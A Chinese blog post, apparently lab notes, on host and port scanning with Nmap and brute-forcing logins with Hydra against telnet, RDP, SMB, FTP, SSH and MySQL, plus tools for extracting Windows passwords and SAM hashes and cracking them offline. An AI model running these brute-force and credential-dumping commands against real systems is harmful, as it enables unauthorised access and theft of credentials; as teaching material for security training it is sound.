扫描与爆破

Posted 朝朝_暮暮

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了扫描与爆破相关的知识,希望对你有一定的参考价值。

扫描

扫描技术

一个一个ping

手工与工具相结合

 

主机探测与端口扫描

主机探测是指确定目标主机是否存活

端口扫描就是寻找在线主机所开放的端口,并在端口上所运行的服务。甚至可以进一步确定目标主机的操作系统类型和更详细的信息。

 

基础知识

常见端口号

21 FTP  443 HTTPS
22 SSH 1433 SQL Server
23 Telnet 1521 Oracle
25 SMTP 3306 mysql
80 HTTP 3389 RDP  

 

 

 

 

 

 

 

Nmap

常用参数

-sP ping扫描
-p 指定端口范围
-sV 服务器版本探测
-O 启用操作系统探测
-A 全面扫描
-oN 保存txt

 

 

 

 

 

 

 

 

 

nmap -sP 10.1.1.1/24 #扫描10.1.1.0整个网段
nmap -p 21,23,442.3389 10.1.1.1/24 #扫描指定端口
nmap -p 21,23 10.1.1.1 -sV #扫描21,23的服务版本
nmap -A 10.1.1.1 #全面扫描
nmap -O 10.1.1.1 #扫描目标系统版本
nmap -p 21,23 10.1.1.1 -oN d:\\result.txt #保存扫描结果

 

九头蛇

hydra -l 用户名 -p 密码 10.1.1.1 telnet 
hydra -l a -P d:\\pass.txt  10.1.1.1 telnet
hydra -l a -P d:\\pass.txt  10.1.1.1 rdp
hydra -l a -P d:\\pass.txt  10.1.1.1 smb
hydra -l a -P d:\\pass.txt  10.1.1.1 ftp
hydra -l a -P d:\\pass.txt  10.1.1.1 ssh
hydra -l a -P d:\\pass.txt  10.1.1.1 mysql 
hydra -L d:\\user.txt -P d:\\pass.txt  10.1.1.1 mysql 

 本地破解

Getpass 从内存中提取密码

 

本地暴力破解

Pwdump 提取sam中的hash值

 

 

 

 

 手工存储hash值

 

 

使用SAMinside软件进行hash暴力破解

 

 

 

以上是关于扫描与爆破的主要内容,如果未能解决你的问题,请参考以下文章

目录与接口收集及利用方式

Python攻防-FTP服务与SSH登录暴力破解

Python攻防-FTP服务与SSH登录暴力破解

网络扫描神器Nmap常用操作方法详解以及使用脚本爆破telnet密码

msf各种弱口令爆破

2019-2020-2 网络对抗技术 20175311胡济栋 Exp5 信息搜集与漏洞扫描